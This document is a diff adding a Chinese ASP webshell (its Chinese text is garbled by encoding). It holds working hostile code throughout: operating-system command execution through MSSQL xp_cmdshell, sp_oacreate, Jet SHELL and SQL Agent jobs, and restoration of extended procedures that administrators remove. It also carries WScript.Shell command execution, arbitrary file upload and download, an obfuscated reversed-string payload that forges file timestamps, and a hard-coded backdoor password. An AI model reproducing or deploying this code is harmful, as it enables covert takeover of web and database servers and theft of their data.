+		       STRQUERY = "SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','SELECT SHELL("&CHR(34)&"CMD.EXE /C COPY 8617.TMP JNC.TMP"&CHR(34)&")');BULK INSERT [JNC] FROM 'JNC.TMP' WITH (KEEPNULLS);"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       STRQUERY="SELECT * FROM [JNC];"
+                       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP 
+                       END IF
+                       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       STRQUERY = "DROP TABLE [JNC];EXEC MASTER..XP_REGWRITE 'HKEY_LOCAL_MACHINE','SOFTWARE\MICROSOFT\JET\4.0\ENGINES','SANDBOXMODE','REG_DWORD',1;SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','SELECT SHELL("&CHR(34)&"CMD.EXE /C DEL 8617.TMP&&DEL JNC.TMP"&CHR(34)&")');"
+		       ADOCONN.EXECUTE(STRQUERY)
+		       END IF
+
+		       ELSEIF REQUEST("TOOL")="SQLSERVERAGENT" THEN
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+
+		       IF REQUEST.FORM("CMD")<>"" THEN
+                       IF SESSION("SQLSERVERAGENT")=0 THEN
+                       STRQUERY = "EXEC MASTER.DBO.XP_SERVICECONTROL 'START','SQLSERVERAGENT';"
+                       ADOCONN.EXECUTE(STRQUERY)
+                       SESSION("SQLSERVERAGENT")=1
+                       END IF
+
+		       STRQUERY = "USE MSDB CREATE TABLE [JNCSQL](RESULTTXT NVARCHAR(1024) NULL) EXEC SP_DELETE_JOB NULL,'X' EXEC SP_ADD_JOB 'X' EXEC SP_ADD_JOBSTEP NULL,'X',NULL,'1','CMDEXEC','CMD /C "&REQUEST.FORM("CMD")&"' EXEC SP_ADD_JOBSERVER NULL,'X',@@SERVERNAME EXEC SP_START_JOB 'X';"
+                       ADOCONN.EXECUTE(STRQUERY)
+                       ADOCONN.EXECUTE(STRQUERY)
+                       ADOCONN.EXECUTE(STRQUERY)
+                    
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE VBCRF
+                       RESPONSE.WRITE "����չ�޻��ԣ�����ͨ���ض���鿴������"
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       STRQUERY = "USE MSDB DROP TABLE [JNCSQL];"
+                       ADOCONN.EXECUTE(STRQUERY)
+                       END IF
+                       ELSEIF REQUEST("TOOL")="" THEN 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('ѡ����Ҫʹ�õ���չ')</SCRIPT>"
+                       END IF
+                       ELSE
+                       RESPONSE.WRITE "<SCRIPT>ALERT('Ȩ�޲���Ŷ��')</SCRIPT>"
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF
+
+ELSEIF REQUEST("SQLAAA")="RESUME" THEN
+                       IF SESSION("LOGIN")<>"" THEN
+                       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+                       IF SESSION("XP_CMDSHELL")=0 THEN
+                       STRQUERY="DBCC ADDEXTENDEDPROC ('XP_CMDSHELL','XPLOG70.DLL')"
+		       ADOCONN.EXECUTE(STRQUERY)	
+                       RESPONSE.WRITE "<FONT COLOR=RED>�Ѿ����Իָ�XP_CMDSHELL</FONT>"
+                       ELSEIF SESSION("SP_OACREATE")=0 THEN
+		       STRQUERY="DBCC ADDEXTENDEDPROC ('SP_OACREATE','ODSOLE70.DLL')"
+		       ADOCONN.EXECUTE(STRQUERY)	
+                       RESPONSE.WRITE "<FONT COLOR=RED>�Ѿ����Իָ�SP_OACREATE</FONT>"
+		       ELSEIF SESSION("XP_REGWRITE")=0 THEN
+		       STRQUERY="DBCC ADDEXTENDEDPROC ('XP_REGWRITE','XPSTAR.DLL')"
+		       ADOCONN.EXECUTE(STRQUERY)	
+                       RESPONSE.WRITE "<FONT COLOR=RED>�Ѿ����Իָ�XP_REGWRITE</FONT>"	
+		       ELSE RESPONSE.WRITE "<FONT COLOR=RED>��ϲ�������ȫ</FONT>"	
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF 	
+                                
+ELSEIF REQUEST("SQLAAA")="SQL" THEN
+                       IF SESSION("LOGIN")<>"" THEN
+		       IF REQUEST.FORM("SQL")<>"" THEN
+                       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+                       STRQUERY=REQUEST.FORM("SQL")
+                       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+                       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP
+		       END IF
+		       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "ִ��SQL���:"
+                       RESPONSE.WRITE REQUEST.FORM("SQL") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF
+
+ELSEIF REQUEST("SQLAAA")="LOGOUT" THEN
+                       SET ADOCONN=NOTHING
+                       SESSION("LOGIN")=""
+                       SESSION("NAME")=""
+                       SESSION("PASS")=""
+                       SESSION("SERVER")=""
+                       SESSION("PORT")=""
+                       SESSION("SYSTEM")=""
+                       SESSION("PRI")=""		              
+END IF
+IF SESSION("LOGIN")="" THEN
+			   RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>SQL�û�����"
+			   RESPONSE.WRITE "<INPUT NAME=NAME TYPE=TEXT ID=NAME VALUE="&SESSION("NAME")&">"
+ 		           RESPONSE.WRITE "  SQL���룺"
+			   RESPONSE.WRITE "<INPUT NAME=PASS TYPE=PASSWORD ID=PASS VALUE="&SESSION("PASS")&">"
+			   RESPONSE.WRITE "<P>SQL��������"
+			   RESPONSE.WRITE "<INPUT NAME=PORT TYPE=TEXT ID=SERVER VALUE=127.0.0.1>"
+ 		           RESPONSE.WRITE "  SQL�˿ڣ�"
+			   RESPONSE.WRITE "<INPUT NAME=PORT TYPE=TEXT ID=PORT VALUE=1433>"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=SUBMIT VALUE=LOGIN>"
+			   RESPONSE.WRITE "</FORM>"
+
+ELSE                       RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>�����⣺"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=TEST>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=������>"
+			   RESPONSE.WRITE "</FORM>"
+
+                           RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>����ָ���"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=RESUME>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=�ָ����>"
+			   RESPONSE.WRITE "</FORM>"
+
+		           RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>ϵͳ���"
+			   RESPONSE.WRITE "  <INPUT NAME=CMD TYPE=TEXT>"
+			   RESPONSE.WRITE "<SELECT NAME='TOOL' ><OPTION VALUE=''>----��ѡ�����г�������----</OPTION><OPTION VALUE=XP_CMDSHELL>XP_CMDSHELL</OPTION><OPTION VALUE=SP_OACREATE>SP_OACREATE</OPTION><OPTION VALUE=XP_REGWRITE>XP_REGWRITE</OPTION><OPTION VALUE=SQLSERVERAGENT>SQLSERVERAGENT</OPTION></OPTION></SELECT>"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=CMD>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=ִ��>"
+			   RESPONSE.WRITE "</FORM>"
+		           RESPONSE.WRITE "<FORM NAME=FORM1 METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>ִ����䣺"
+			   RESPONSE.WRITE "   <INPUT NAME=SQL TYPE=TEXT>"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=SQL>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=ִ��>"			   
+			   RESPONSE.WRITE "</FORM>"                   
+END IF:End Function
+execute(shisanfun("bus dne��fi dne���>retnec/< ��������;psbn&;psbn&��&emaNelif&htap&��;psbn&;psbn&���ĸ���>rb/<>rb/<�� SRR��emiTwen=etadyfidoM.elif_ppa��)emaNelif(emaNesraP.htap_ppa=elif_ppa teS��))��.��(htappam.revres(ecapSemaN.llehs=htap_ppa teS��)��noitacilppA.llehS��(tcejbOetaerC.revreS=llehs teS��gniXuhS=setubirtta.elif��)emaNelif&htap(eliFteg.osf=elif teS��))0,0(tbo(tcejbOetaerC.revreS=osf teS��neht) )0>)emiTwen(nel(dna)0>)emaNelif(nel(dna)0>)htap(nel( (fi���>mrof/<�� SRR���>����=eulav timbus=epyt tupni<�� SRR���>/rb<>'04'=ezis '0'=eulav gnixuhs=eman tupni<������ ���ީ� SRR���>noitpo/< ͳϵ,����,������ֻ>'93'=eulav noitpo<�� SRR���>noitpo/< ����,������ֻ>'53'=eulav noitpo<�� SRR���>noitpo/< ����,����>'43'=eulav noitpo<�� SRR���>noitpo/< ����,��ֻ>'33'=eulav noitpo<�� SRR���>noitpo/<ͳϵ>'4'=eulav noitpo<�� SRR���>noitpo/< ����>'2'=eulav noitpo<�� SRR���>noitpo/< ��ֻ>'1'=eulav noitpo<�� SRR���>noitpo/< ͨ��>''=eulav noitpo<�� SRR���>';eulav.siht=eulav.gnixuhs.mrof.siht'=egnahCno tceles<�� SRR���>/rb<��:��:ʱ ��/��/��;psbn&>'06'=ezis '95:95:32 2102/12/21'=eulav emit=eman tupni<����ʱ����;psbn&;psbn&;psbn&�� SRR���>/rb<)�����ĵĸ���Ҫ(>'06'=ezis 'psa.xedni'=eulav emanelif=eman tupni<����������;psbn&�� SRR���>/rb<)β��\��Ҫ��һ(>'06'=ezis '��&TOORWWW&��'=eulav '1htap'=eman tupni<����;psbn&;psbn&;psbn&;psbn&·>retnec<�� SRR���>tsop=dohtem mrof<�� SRR��)��gnixuhs��(mroF.tseuqer=gniXuhS tes��)��emit��(mroF.tseuqer=emiTwen tes��)��emanelif��(mroF.tseuqer=emaNelif tes��)��1htap��(mroF.tseuqer=htap tes��gniXuhS,emiTweN,emaNeliF,htaP mid��)(txeTeliFteS bus"))
+Function ServerInfo():SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
+SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
+SI=SI&"<form method=post action='http://www.ip138.com/ips.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"
+SI=SI&"<input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&now&"&nbsp;</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'>&nbsp;</td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 13
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+RRS SI:
+End Function:Function DownFile(Path):Response.Clear
+Set OSM = CreateObject(ObT(6,0))
+OSM.Open
+OSM.Type = 1
+OSM.LoadFromFile Path
+sz=InstrRev(path,"\")+1
+Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)
+Response.AddHeader "Content-Length", OSM.Size
+Response.Charset = "UTF-8"
+Response.ContentType = "application/octet-stream"
+Response.BinaryWrite OSM.Read
+Response.Flush
+OSM.Close
+Set OSM = Nothing:End Function:Function HTMLEncode(S):if not isnull(S) then
+    S = replace(S, ">", "&gt;")
+    S = replace(S, "<", "&lt;")
+    S = replace(S, CHR(39), "&#39;")
+    S = replace(S, CHR(34), "&quot;")
+    S = replace(S, CHR(20), "&nbsp;")
+    HTMLEncode = S
+  end if:End Function:Function UpFile():If Request("Action2")="Post" Then
+    Set U=new UPC : Set F=U.UA("LocalFile")
+	UName=U.form("ToPath")
+    If UName="" Or F.FileSize=0 then
+      SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+    Else
+        F.SaveAs UName
+        If Err.number=0 Then
+          SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+		End if
+	End If
+	Set F=nothing:Set U=nothing
+	SI=SI&BackUrl
+	RRS SI
+	ShowErr()
+	Response.End
+  End If
+    SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+    SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+    SI=SI&"<tr><td>"
+    SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\cmd.exe")&"' size='40'>"
+    SI=SI&" <input name='LocalFile' type='file'  size='25'>"
+    SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+    SI=SI&"</td></tr></form></table>"
+  RRS SI:End Function:Function Cmd1Shell():checked=" checked"
+If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
+ShellPath=Session("ShellPath")
+if ShellPath="" Then ShellPath = "cmd.exe"
+if Request("wscript")<>"yes" then checked=""
+If Request("cmd")<>"" Then DefCmd = Request("cmd")
+SI="<form method='post'>"
+SI=SI&"SHELL·����<input name='SP' value='"&ShellPath&"' Style='width:70%'>&nbsp;&nbsp;"
+SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
+SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='ִ��'><textarea Style='width:100%;height:440;' class='cmd'>"
+If Request.Form("cmd")<>"" Then
+if Request.Form("wscript")="yes" then
+Set CM=CreateObject(ObT(1,0))
+Set DD=CM.exec(ShellPath&" /c "&DefCmd)
+aaa=DD.stdout.readall
+SI=SI&aaa
+else
+On Error Resume Next
+Set ws=Server.CreateObject("WScript.Shell")
+Set ws=Server.CreateObject("WScript.Shell")
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+szTempFile = server.mappath("cmd.txt")
+Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
+aaa=Server.HTMLEncode(oFilelcx.ReadAll)
+oFilelcx.Close
+Call fso.DeleteFile(szTempFile, True)
+SI=SI&aaa
+end if
+End If
+SI=SI&chr(13)&"</textarea></form>"
+RRS SI:End Function
+
+
+Function CreateMdb(Path):SI="<br><br>"
+   Set C = CreateObject(ObT(2,0)) 
+   C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)
+   Set C = Nothing
+   If Err.number=0 Then
+     SI = SI & Path & "�����ɹ�!"
+   End If
+   SI=SI&BackUrl 
+   RRS SI:End function:Function CompactMdb(Path):If Not ObT(0,1) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path
+	Set C=Nothing
+Else
+  Set FSO=CreateObject(ObT(0,1))
+  If FSO.FileExists(Path) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"
+	Set C=Nothing
+    FSO.DeleteFile Path
+	FSO.MoveFile Path&"_bak",Path
+  Else
+    SI="<center><br><br><br>���ݿ�"&Path&"û�з��֣�</center>" 
+	Err.number=1
+  End If
+  Set FSO=Nothing
+End If
+  If Err.number=0 Then
+    SI="<center><br><br><br>���ݿ�"&Path&"ѹ���ɹ���</center>"
+  End If
+  SI=SI&BackUrl
+  RRS SI:End Function
+if sessIoN("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("web2a2dmin")=userPass
+response.redirect url
+else
+ rrs"<br><br><br><br><br><br><br><br><center>���벻��ȷ,��ȷ���Ƿ���������<br><a href='javascript:history.back()'>�� ��</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"' target='_blank'>"&mname&"</a><form action='"&url&"' method='post'>�������룺<input name='pass' type='password' size='22'> <input type='submit' value='��½'><br><br><br><font color=#3399FF>"&Copyright&"</font><br></div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if:Function DbManager():SqlStr=Trim(Request.Form("SqlStr"))
+  DbStr=Request.Form("DbStr")
+  SI=SI&"<table width='650'  border='0' cellspacing='0' cellpadding='0'>"
+  SI=SI&"<form name='DbForm' method='post' action=''>"
+  SI=SI&"<tr><td width='100' height='27'> &nbsp;���ݿ����Ӵ�:</td>"
+  SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
+  SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>���Ӵ�ʾ��</option><option value=0>Access����</option>"
+  SI=SI&"<option value=1>MsSql����</option><option value=2>MySql����</option><option value=3>DSN����</option>"
+  SI=SI&"<option value=-1>--SQL�﷨--</option><option value=4>��ʾ����</option><option value=5>��������</option>"
+  SI=SI&"<option value=6>ɾ������</option><option value=7>�޸�����</option><option value=8>�����ݱ�</option>"
+  SI=SI&"<option value=9>ɾ���ݱ�</option><option value=10>�����ֶ�</option><option value=11>ɾ���ֶ�</option>"
+  SI=SI&"<option value=12>��ȫ��ʾ</option></select></td></tr>"
+  SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
+  SI=SI&"<tr><td height='30'>&nbsp;SQL��������:</td>"
+  SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
+  SI=SI&"<td align='center'><input type='submit' name='Submit' value='ִ��' onclick='return DbCheck()'></td>"
+  SI=SI&"</tr></form></table><span id='abc'></span>"
+  RRS SI:SI=""
+  If Len(DbStr)>40 Then
+  Set Conn=CreateObject(ObT(5,0))
+  Conn.Open DbStr
+  Set Rs=Conn.OpenSchema(20) 
+  SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>��<br>��</td>"
+  Rs.MoveFirst 
+  Do While Not Rs.Eof
+    If Rs("TABLE_TYPE")="TABLE" then
+	  TName=Rs("TABLE_NAME")
+      SI=SI&"<td align=center><a href=""javascript:if(confirm('ȷ��ɾ��ô��'))FullSqlStr('DROP TABLE ["&TName&"]',1)"">[ del ]</a><br>"
+      SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
+    End If 
+    Rs.MoveNext 
+  Loop 
+  Set Rs=Nothing
+  SI=SI&"</tr></table>"
+  RRS SI:SI=""
+If Len(SqlStr)>10 Then
+  If LCase(Left(SqlStr,6))="select" then
+    SI=SI&"ִ����䣺"&SqlStr
+    Set Rs=CreateObject("Adodb.Recordset")
+    Rs.open SqlStr,Conn,1,1
+    FN=Rs.Fields.Count
+    RC=Rs.RecordCount
+    Rs.PageSize=20
+    Count=Rs.PageSize
+    PN=Rs.PageCount
+    Page=request("Page")
+    If Page<>"" Then Page=Clng(Page)
+    If Page="" Or Page=0 Then Page=1
+    If Page>PN Then Page=PN
+    If Page>1 Then Rs.absolutepage=Page
+    SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"	  
+    For n=0 to FN-1
+      Set Fld=Rs.Fields.Item(n)
+      SI=SI&"<td align='center'>"&Fld.Name&"</td>"
+      Set Fld=nothing
+    Next
+    SI=SI&"</tr>"
+    Do While Not(Rs.Eof or Rs.Bof) And Count>0
+	  Count=Count-1
+	  Bgcolor="#EFEFEF"
+	  SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"  
+	  For i=0 To FN-1
+        If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
+        If RC=1 Then
+           ColInfo=HTMLEncode(Rs(i))
+        Else
+           ColInfo=HTMLEncode(Left(Rs(i),50))
+        End If
+	    SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
+	  Next
+	  SI=SI&"</tr>"
+      Rs.MoveNext
+    Loop
+	RRS SI:SI=""
+	SqlStr=HtmlEnCode(SqlStr)
+    SI=SI&"<tr><td colspan="&FN+1&" align=center>��¼����"&RC&"&nbsp;ҳ�룺"&Page&"/"&PN
+    If PN>1 Then
+      SI=SI&"&nbsp;&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""",1)'>��ҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>��һҳ</a>&nbsp;"
+      If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
+      For i=Sp To Sp+8
+        If i>PN Then Exit For
+        If i=Page Then
+        SI=SI&i&"&nbsp;"
+        Else
+        SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a>&nbsp;"
+        End If
+      Next
+	  SI=SI&"&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>��һҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>βҳ</a>"
+    End If
+    SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
+    Rs.Close:Set Rs=Nothing
+	RRS SI:SI=""
+  Else	   
+    Conn.Execute(SqlStr)
+    SI=SI&"SQL��䣺"&SqlStr
+  End If
+  RRS SI:SI=""
+End If
+  Conn.Close
+  Set Conn=Nothing
+  End If:End Function
+  Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+Dim T1
+
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+    F=lcase(F)
+    If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+  Public Function UA(F)
+    F=lcase(F)
+    If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+    set D1=CreateObject(ObT(4,0))
+	if Request.TotalBytes<1 then Exit Sub
+    set T1 = CreateObject(ObT(6,0))
+	T1.Type = 1 : T1.Mode =3 : T1.Open
+    T1.Write  Request.BinaryRead(Request.TotalBytes)
+    T1.Position=0 : TDa =T1.Read : DStart = 1
+    DEnd = LenB(TDa)
+    set D2=CreateObject(ObT(4,0))
+	vbCrlf = chrB(13) & chrB(10)
+    set T2 = CreateObject(ObT(6,0))
+    TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+    TLen = LenB (TSt)
+    DStart=DStart+TLen+1
+    while (DStart + 10) < DEnd
+      DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+      T2.Type = 1 : T2.Mode =3 : T2.Open
+      T1.Position = DStart
+      T1.CopyTo T2,DIEnd-DStart
+      T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+      TIn = T2.ReadText : T2.Close
+      DStart = InStrB(DIEnd,TDa,TSt)
+      FStart = InStr(22,TIn,"name=""",1)+6
+      FEnd = InStr(FStart,TIn,"""",1)
+      UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+      if InStr (45,TIn,"filename=""",1) > 0 then
+        set TFL=new FIF
+        FStart = InStr(FEnd,TIn,"filename=""",1)+10
+        FEnd = InStr(FStart,TIn,"""",1)
+        FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+        FEnd = InStr(FStart,TIn,vbCr)
+        TFL.FileStart =DIEnd
+        TFL.FileSize = DStart -DIEnd -3
+        if not D2.Exists(UpName) then
+          D2.add UpName,TFL
+        end if
+      else
+        T2.Type =1 : T2.Mode =3 : T2.Open
+        T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+        T2.Position = 0 : T2.Type = 2
+        T2.Charset ="gb2312"
+        SFV = T2.ReadText
+        T2.Close
+        if D1.Exists(UpName) then
+          D1(UpName)=D1(UpName)&", "&SFV
+        else
+          D1.Add UpName,SFV
+        end if
+      end if
+      DStart=DStart+TLen+1
+    wend
+    TDa=""
+    set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+    if Request.TotalBytes>0 then
+      D1.RemoveAll:D2.RemoveAll
+      set D1=nothing:set D2=nothing
+      T1.Close:set T1 =nothing
+    end if
+  End Sub
+End Class
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+     T3.Mode=3 : T3.Type=1 : T3.Open
+     T1.position=FileStart
+     T1.copyto T3,FileSize
+     T3.SaveToFile F,2
+     T3.Close
+     set T3=nothing
+     SaveAs=false
+   end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+    SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+    Set CF=Nothing
+End Sub
+Function ShowDriver():For Each D in CF.Drives
+      RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>���ش��� ("&D.DriveLetter&":)</a><br>" 
